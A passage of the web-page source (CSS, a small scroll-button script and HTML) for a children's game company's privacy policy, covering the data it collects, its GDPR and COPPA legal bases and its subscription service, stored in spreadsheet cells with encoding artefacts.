    color: #4a98f0;_x005F_x000D_
    margin: 0;_x005F_x000D_
    text-transform: none;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .scroll_top {_x005F_x000D_
    position: fixed;_x005F_x000D_
    bottom: 20px;_x005F_x000D_
    </t>
  </si>
  <si>
    <t>right: 15px;_x005F_x000D_
    background-color: rgba(0, 0, 0, 0.46);_x005F_x000D_
    width: 50px;_x005F_x000D_
    height: 50px;_x005F_x000D_
    text-align: center;_x005F_x000D_
    color: #fff;_x005F_x000D_
    font-size: 35px;_x005F_x000D_
    border-radius: 10px;_x005F_x000D_
    z-index: 999;_x005F_x000D_
    cursor: pointer;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  tr.no-bottom-border td {_x005F_x000D_
    border-top: none ! important;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  section h2 {_x005F_x000D_
    text-align: center;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .privacy_policy a.go_to {_x005F_x000D_
    color: #555;_x005F_x000D_
    cursor: pointer;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .privacy_policy a.go_to:hover {_x005F_x000D_
    color: #bebebe;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .privacy_policy a:hover {_x005F_x000D_
    color: #111;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .divider {_x005F_x000D_
    margin:</t>
  </si>
  <si>
    <t>20px auto;_x005F_x000D_
    border-bottom: 1px solid #ececec;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .bg-for-kids h2 {_x005F_x000D_
    font-size: 3.5em;_x005F_x000D_
    text-align: center;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .bg-for-kids {_x005F_x000D_
    font-size: 16px;_x005F_x000D_
    background: #ff86d3;_x005F_x000D_
    color: #fff !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
    padding: 100px 20px 100px 20px;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .bg-for-kids .image-right img {_x005F_x000D_
    float: right;_x005F_x000D_
    height: 260px;_x005F_x000D_
    width: 400px;_x005F_x000D_
    margin: 0 0 10px 10px;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .bg-for-kids div,_x005F_x000D_
  .bg-for-kids div p {_x005F_x000D_
    color: #fff;_x005F_x000D_
    line-height: 1.8;_x005F_x000D_
    font-size: 16px !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  @media screen and (max-width: 800px) {_x005F_x000D_
    .bg-for-kids {_ x000D_
      padding: 40px 20px 40px 20px;_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .bg-for-kids h2 {_x005F_x000D_
      font-size: 2em;_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .bg-for-kids .image-right</t>
  </si>
  <si>
    <t>img {_x005F_x000D_
      float: none;_x005F_x000D_
      display: block;_x005F_x000D_
      margin: auto;_x005F_x000D_
      max-width: 95% ! important;_x005F_x000D_
      height: initial !important;_x005F_x000D_
    }_x005F_x000D_
  }_x005F_x000D_
_ x000D_
  body {_x005F_x000D_
    font-family: 'Open Sans', sans-serif !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .underline {_x005F_x000D_
    text-decoration: underline;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  /*  _ x000D_
    Accordion _x005F_x000D_
    CSS _x005F_x000D_
  */_x005F_x000D_
_x005F_x000D_
  .accordion {_x005F_x000D_
    background-color: #eee;_x005F_x000D_
    color: #444;_x005F_x000D_
    cursor: pointer;_x005F_x000D_
    padding: 18px;_x005F_x000D_
    width: 100%;_x005F_x000D_
    border: none;_x005F_x000D_
    text-align: left;_x005F_x000D_
    outline: none;_x005F_x000D_
    font-size: 15px;_x005F_x000D_
    transition: 0.4s;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .active,_x005F_x000D_
  .accordion:hover {_x005F_x000D_
    background-color: #e2e2e2;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .accordion:after {_x005F_x000D_
    content: url("data:image/svg+xml;utf8,&lt;svg xmlns='http://www.w3.org/2000/svg' width='10' height='17' viewBox='0 0 10 15' fill='none'&gt;&lt;path d='M1.39726 0L10 8.33333L1.39726 16.6667L0 15.3132L7.20548 8.33333L0 1.35351L1.39726 0Z' fill='%23636363'/&gt;&lt;/svg&gt;");_x005F_x000D_
    color: #777;_x005F_x000D_
    font-weight: bold;_x005F_x000D_
    float: right;_x005F_x000D_
    margin-left: 5px;_x005F_x000D_
    transition: transform .2s</t>
  </si>
  <si>
    <t>ease-in-out;_x005F_x000D_
  }_x005F_x000D_
_ x000D_
  .active:after {_x005F_x000D_
    transform: translateX(-5px) rotate(90deg);_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .panel {_x005F_x000D_
    margin-bottom: 0px;_x005F_x000D_
    padding: 0 18px;_x005F_x000D_
    background-color: white;_x005F_x000D_
    max-height: 0;_x005F_x000D_
    overflow: hidden;_x005F_x000D_
    transition: max-height 0.2s ease-out;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  /*_x005F_x000D_
    Two _x005F_x000D_
    Column_x005F_x000D_
    Layout_x005F_x000D_
  */_x005F_x000D_
_x005F_x000D_
  /* Create two equal columns that floats next to each other */_x005F_x000D_
  .column {_x005F_x000D_
    float: left;_x005F_x000D_
    padding: 10px;_x005F_x000D_
    height: max-content;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .column-width-20 {_x005F_x000D_
    width: 20%;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .column-width-40 {_x005F_x000D_
    width: 40%;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .column-width-60 {_x005F_x000D_
    width: 60%;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .column-width-80 {_x005F_x000D_
    width:</t>
  </si>
  <si>
    <t xml:space="preserve">80%;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .column,_x005F_x000D_
  .column-width-20,_x005F_x000D_
  .column-width-40,_x005F_x000D_
  .column-width-60,_x005F_x000D_
  .column-width-80 {_x005F_x000D_
    box-sizing: border-box;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  /* Clear floats after the columns */_x005F_x000D_
  .row:after {_x005F_x000D_
    content: "";_x005F_x000D_
    display: table;_x005F_x000D_
    clear: both;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  / * Responsive layout - makes the two columns stack on top of each other instead of next to each other */_x005F_x000D_
  @media screen and (max-width: 600px) {_x005F_x000D_
_ x000D_
    .column-width-20,_x005F_x000D_
    .column-width-40,_x005F_x000D_
    .column-width-60,_x005F_x000D_
    .column-width-80 {_x005F_x000D_
      width: 100%;_x005F_x000D_
    }_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  /*_x005F_x000D_
    </t>
  </si>
  <si>
    <t>Various other CSS_x005F_x000D_
  */_x005F_x000D_
_ x000D_
  .panel ul {_x005F_x000D_
    list-style: unset;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .panel ul&gt;li {_x005F_x000D_
    margin-inline: 15px;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .panel i {_x005F_x000D_
    font-style: italic;_x005F_x000D_
  }_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
  /* ------------------------------------------------------ */_x005F_x000D_
  / * Detect distance from top and show scroll to top button */_x005F_x000D_
  /* ------------------------------------------------------ */_x005F_x000D_
  $(window).scroll(function() {_x005F_x000D_
    var mod = $(window).scrollTop();_x005F_x000D_
    var doc_height</t>
  </si>
  <si>
    <t xml:space="preserve">*/_x005F_x000D_
  $(document).on("click", ".scroll_top", function() {_x005F_x000D_
    $('html, body').animate({_x005F_x000D_
      scrollTop: Math.ceil($("#wrap").offset().top - $("header").height() - 20)_x005F_x000D_
    }, 1000);_x005F_x000D_
  });_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
&lt;main&gt;_x005F_x000D_
  &lt;div style="display:none" class="scroll_top"&gt;&lt;em class="icon-arrow-up"&gt;&lt;/em&gt;&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
  &lt;div class="bg-for-kids"&gt;_x005F_x000D_
    &lt;h2&gt;Children’s Privacy Notice&lt;/h2&gt;_x005F_x000D_
    &lt;div class="container container-small image-right"&gt;_x005F_x000D_
      &lt;img src="/images/panda_final.png" alt="privacy_panda"&gt;_x005F_x000D_
      &lt;div&gt;_x005F_x000D_
        &lt;p&gt;Hello! This is where we keep our &lt;b&gt;Privacy Policy.&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
        &lt;p&gt; We are devoted to creating fun mobile games that brighten up your day._x005F_x000D_
          </t>
  </si>
  <si>
    <t xml:space="preserve">We care about your safety online and want you to have the best time with our apps.&lt;/p&gt;_x005F_x000D_
        &lt;p&gt;When you play our games, we do not collect any of your personal information,_x005F_x000D_
          such data as your full name, address, email or phone number. &lt;/p&gt;_x005F_x000D_
        &lt;p&gt; We may collect general information, for example, the country you live in,_x005F_x000D_
          how much time you spend in our game, types of mobile devices you use and similar._x005F_x000D_
          This info is not associated with you, we are getting it as a big pile of impersonalised numbers._x005F_x000D_
          </t>
  </si>
  <si>
    <t>This information helps us better understand our audience and improve our games. &lt;/p&gt;_x005F_x000D_
        &lt;p&gt; In our games, you may see ads.</t>
  </si>
  <si>
    <t>We have a dedicated ads quality team to sure that all ads are appropriate for children and that no personal information about your interactions with ads is collected.&lt;/p&gt;_x005F_x000D_
        &lt;p&gt; The rest of this document is a detailed information about our privacy practices._x005F_x000D_
          If you have any questions about your privacy or this Privacy policy,_x005F_x000D_
          you may always contact us at &lt;a class="underline" href="mailto:privacy@tutotoons.com"&gt;&lt;b&gt;privacy@tutotoons.com&lt;/b&gt;&lt;/a&gt; for more information.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
  &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
  &lt;!-- *************************************** --&gt;_x005F_x000D_
  &lt;!--                Policy page              --&gt;_x005F_x000D_
  &lt;!-- *************************************** --&gt;_x005F_x000D_
  &lt;section class="white bot_push privacy_policy"&gt;_x005F_x000D_
_x005F_x000D_
    &lt;div class="container container-small push_f_top bottom-space"&gt;_x005F_x000D_
      &lt;h1&gt;TUTOTOONS</t>
  </si>
  <si>
    <t>PRIVACY POLICY&lt;/h1&gt;_x005F_x000D_
      &lt;p&gt;Last Revised: 6th of April, 2023&lt;/p&gt;_x005F_x000D_
      &lt;section&gt;_x005F_x000D_
        &lt;p&gt;&lt;b&gt;At TutoTOONS&lt;/b&gt;, ("TutoTOONS", "we") we take privacy seriously and this this Privacy policy is designed to share what information we collect and how we use it._x005F_x000D_
          This Privacy Policy is in compliance with the US Children's Online Privacy Protection Act (COPPA) and the European General Data Protection Regulation (GDPR)._x005F_x000D_
          If you have questions about this Privacy Policy or wish to exercise your rights, please do not hesitate to contact us by email at &lt;a class="underline" href="mailto:privacy@tutotoons.com"&gt;&lt;b&gt;privacy@tutotoons.com&lt;/b&gt;&lt;/a&gt;. &lt;/p&gt;_x005F_x000D_
      &lt;/section&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;WHO IS THE CONTROLLER OF YOUR PERSONAL DATA?&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;TutoTOONS Limited is a company with registered office in Kintail House, Beechwood Park, Inverness, Scotland, IV2 3BW. We are the Data Controller responsible for your Personal Data.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;_x005F_x000D_
_ x000D_
        &lt;p&gt;&lt;b&gt;Our contact details:&lt;/b&gt;&lt;br&gt;_x005F_x000D_
          TutoTOONS LIMITED&lt;br&gt;_x005F_x000D_
          Kintail House, Beechwood Park, Inverness, Scotland, IV2 3BW&lt;br&gt;_x005F_x000D_
          Phone: +37037300833&lt;br&gt;_x005F_x000D_
          </t>
  </si>
  <si>
    <t>Email: &lt;a class="underline" href="mailto:privacy@tutotoons.com"&gt;privacy@tutotoons.com&lt;/a&gt;&lt;br&gt;_x005F_x000D_
        &lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;PURPOSE OF THIS PRIVACY POLICY&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;While you visit our website at &lt;a class="underline" href="/"&gt;www.tutotoons.com&lt;/a&gt; or you play TutoTOONS games ("Services" or "Games"), we may collect information about you ("Personal Data")._x005F_x000D_
          By this Privacy Policy, we want to clearly and comprehensively explain what data we collect, how we use, disclose and transfer it.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;From time to time, we may change the terms of this Privacy Policy, so do not forget to read this Privacy Policy on a regular basis to understand how we use your Personal Data._x005F_x000D_
          If we make a material change to this policy, we will post a notice on our website prior to making the change. If we have your parent email address, we will contact you to let you know about the changes.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_ x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;PERSONAL DATA</t>
  </si>
  <si>
    <t>WE COLLECT&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;&lt;b&gt;Note: You must update any mobile applications downloaded before 2018 May 25th&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
        &lt;p&gt;Personal data is any information that relates to an identifiable individual._x005F_x000D_
           When you you visit our website at &lt;a class="underline" href="/"&gt;www.tutotoons.com&lt;/a&gt; or you play TutoTOONS games ("Services" or "Games"), we may we may collect and process the following personal data about you: &lt;/p&gt;_x005F_x000D_
_ x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Contact Information&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt;You may provide us with your Contact Information, such as your phone number and email when you contact us with a question or request._x005F_x000D_
            &lt;p&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Note:&lt;/b&gt;</t>
  </si>
  <si>
    <t>If a child under the age of 13 years old in the USA or under the age of 16 years old in the EU has contacted us through email, and we need to communicate with the child more than once to resolve the query, we will ask the child to provide us with the child's parent or guardian's email._x005F_x000D_
              Then we will send the parent or guardian a notice telling that his/her child has contacted us. If we do not obtain parental consent after a reasonable time from the date of the data collection, we will delete such data from our records.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
            &lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Location Data&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt; We do not collect data about your exact location (address) in any case.</t>
  </si>
  <si>
    <t>We can collect data about your location, i.e. city or country._x005F_x000D_
               We collect this data automatically when you use our Services or play our Games.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Technical Data&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt;We may collect such information as your IP address, advertising ID, and other technologies on the devices that you use in our Services or play our Games._x005F_x000D_
               We can also collect non-personal Technical Data about the mobile operating system, mobile browser type, screen resolution, device vendor, language._x005F_x000D_
              We collect this data automatically when you use our Services or play our Games.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Usage Data&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt;</t>
  </si>
  <si>
    <t>We can collect statistics on how you use our Services or play our Games. This information does not contain information that will help us identify you._x005F_x000D_
               We need this information so that we can provide you with the Services, improve their quality, adapt them to your needs.&lt;/p&gt;_x005F_x000D_
            &lt;p&gt;Please note, if you decide to purchase the TutoTOONS games subscription, we may collect and use additional personal data as stated in section 7.</t>
  </si>
  <si>
    <t>TutoTOONS Subscription.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt; We are not collecting or storing any of your financial data as management of any payments is done by the respective platform you are using to download our apps from, such as iTunes, Google play, Amazon or others.&lt;/p&gt;_x005F_x000D_
        &lt;p&gt; We do not collect and do not intend to collect "special categories of data", such as any information about health, race, religion, political opinions or philosophical beliefs, sexual beliefs or orientation, as well as any data that is not necessary for the provision of our services.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;HOW WE COLLECT PERSONAL DATA&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;We use several methods to collect Personal Data:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-40"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Personal Data is provided directly by you&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-60"&gt;_x005F_x000D_
            &lt;p&gt;You provide us with your data when you contact us by email, social networks or phone, ask to answer your question.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_ x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-40"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;We collect Personal Data automatically&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-60"&gt;_x005F_x000D_
            &lt;p&gt;When you use our Services, e.g. visit our website, play our games, we can automatically collect technical information about your IP address, promotional identifiers, equipment, browsing actions and models you use, as well as statistics._x005F_x000D_
               We collect this Personal Data using cookies, automated event logs and other similar technologies.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-40"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;We collect Personal Data from third parties&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-60"&gt;_x005F_x000D_
            &lt;p&gt;We may receive Personal Data about you from third-party sources, i.e. from other companies and persons (see section Our third-party data controllers and processors).&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;HOW WE USE YOUR PERSONAL DATA&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;</t>
  </si>
  <si>
    <t>We will only use your Personal Data as permitted by law. Usually, we will use your Personal Data in the following circumstances:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Provide our services or&lt;p&gt;&lt;br&gt;Pursue legitimate business interests related to providing our services to you&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt;In order to fulfil our obligations when you use our website or our mobile applications, e.g. to ensure that the Services are provided, to improve the Services, to identify subscribers and manage subscriptions, to personalize the content you use, to respond to your requests and inquiries._x005F_x000D_
              Also, in order to fulfil our legal obligations, we may ask for the child's parent or guardian's email when we must obtain the consent of parents or guardians to use the child's Personal Data (email and name)._x005F_x000D_
              When it is necessary to fulfil our contractual obligations or safeguard our legitimate interests, we use your Personal Data, e.g. to provide you with contextual advertising, to analyse your behaviour using our Services, to ensure the security and integrity of our Services.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Establish, exercise or defend legal claims&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt; We may also use your Personal Data to enforce or defend our rights, protect your interests, prevent and/or detect fraud or deceptive behaviour.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We will not use your data to provide you with behavioural advertising, as well as remarketing, profiling and automated decision making.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt; ON WHAT LEGAL BASIS WE USE PERSONAL DATA&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;Generally, we collect and process your personal information only in order to fulfil our obligations to you, use it for legitimate interests and protect your rights (support for the internal operations), or if we have your consent to do so._x005F_x000D_
          Below, we provide you with information on the purposes and grounds for usage of your Personal Data.&lt;/p&gt;_x005F_x000D_
_ x000D_
        &lt;table class="table"&gt;_x005F_x000D_
          &lt;col width="30%"&gt;_x005F_x000D_
          &lt;col width="20%"&gt;_x005F_x000D_
          &lt;col width="50%"&gt;_x005F_x000D_
          &lt;thead&gt;_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;th&gt;Activity&lt;/th&gt;_x005F_x000D_
              &lt;th&gt;Data type&lt;/th&gt;_x005F_x000D_
              &lt;th&gt;Legal basis for data processing&lt;/br&gt;according to GDPR / COPPA&lt;/th&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
          &lt;/thead&gt;_x005F_x000D_
          &lt;tbody&gt;_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Manage and protect our website and our mobile applications_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;b&gt;Contact Data&lt;br&gt;Technical Data&lt;br&gt;Usage Data&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
               &lt;td&gt;_x005F_x000D_
                (a) Necessary for our legitimate interests (GDPR)&lt;br&gt;_x005F_x000D_
                (b) Necessary for support for the internal operations (COPPA)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_ x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Provide Services, improve Services, customize Services for your individual needs_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                &lt;b&gt;Technical Data&lt;br&gt;Usage Data&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                (a) Necessary for fulfilling our contractual obligations (GDPR)&lt;br&gt;_x005F_x000D_
                (b) Necessary for support for the internal operations (COPPA)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Identify games subscribers and manage games subscriptions (only if you get subscription plan)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                &lt;b&gt;Contact Data&lt;br&gt;Usage Data&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                (a) Necessary for fulfilling our contractual obligations (GDPR)&lt;br&gt;_x005F_x000D_
                (b) Necessary for fulfilling our contractual obligations (GDPR)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Submit contextual advertising to you, analyse your behaviour using our Services_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                &lt;b&gt;Technical Data&lt;br&gt;Usage Data&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                a) Necessary for our legitimate interests and for fulfilling our contractual obligations (GDPR)&lt;br&gt;_x005F_x000D_
                b) Necessary for support for the internal operations (COPPA)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Reply to your applications, requests, notifications_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;td&gt;_x005F_x000D_
                &lt;b&gt;Contact Data&lt;br&gt;Contact data such as email or phone number&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
               &lt;td&gt;_x005F_x000D_
                a) Necessary for fulfilling our contractual obligations and for legitimate interests (GDPR)&lt;br&gt;_x005F_x000D_
                If a child under the age of 13 years old in the USA or under the age of 16 years old in the EU has contacted us through email, and we need to communicate with the child more than once to resolve the query, we will ask the child to provide us with the child's parent or guardian's email._x005F_x000D_
                Then we will send the parent or guardian a notice telling us that his/her child has contacted us. If we do not obtain parental consent after a reasonable time from the date of the data collection, we will delete such data from our records._x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Get the child's parent's or guardian's consent_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;td&gt;_x005F_x000D_
                &lt;b&gt;Contact Data&lt;br&gt;(email)&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                a) Necessary to comply with our legal obligations (GDPR)&lt;br&gt;_x005F_x000D_
                b) Exception to prior parental consent (COPPA)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_x005F_x000D_
          &lt;/tbody&gt;_x005F_x000D_
        &lt;/table&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt; We will use your Personal Data for the purposes for which we have collected them, unless we reasonably believe that we must use it for another purpose that is compatible with the original_x005F_x000D_
        &lt;p&gt;Please note that in cases where we must process Personal Data when required by law, we may process your Personal Data without your knowledge or consent.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_ x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;TUTOTOONS SUBSCRIPTION (TUTOCLUB)&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;If you would like to curated selection of TutoTOONS games for your child that cherish creativity and help develop useful, we will need to identify you by creating a subscriber's account._x005F_x000D_
          </t>
  </si>
  <si>
    <t>In order to get access to TutoTOONS games subscription, a child's parent or guardian is required to agree to our Terms of Use and Privacy Policy as well as login by choosing a preferable login method (platform you’re using to play our games, such as Google Play, Apple App Store, etc.).&lt;/p&gt;_x005F_x000D_
        &lt;p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;/p&gt;_x005F_x000D_
      &lt;p&gt;_x005F_x000D_
_x005F_x000D_
      &lt;/p&gt;_x005F_x000D_
        &lt;p&gt;&lt;b&gt;Personal data we collect&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;If you decide to get a TutoTOONS games subscription for your child, we may collect and use some of your personal data, such as chosen login method, email address, current subscription plan, billing, connected devices, unique ID, advertisement ID and device ID.&lt;/p&gt;_x005F_x000D_
        &lt;p&gt; We are not collecting or storing any of your financial data as management of any payments is done by the respective platform you are using to download our apps from, such as iTunes, Google play, Amazon or others.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
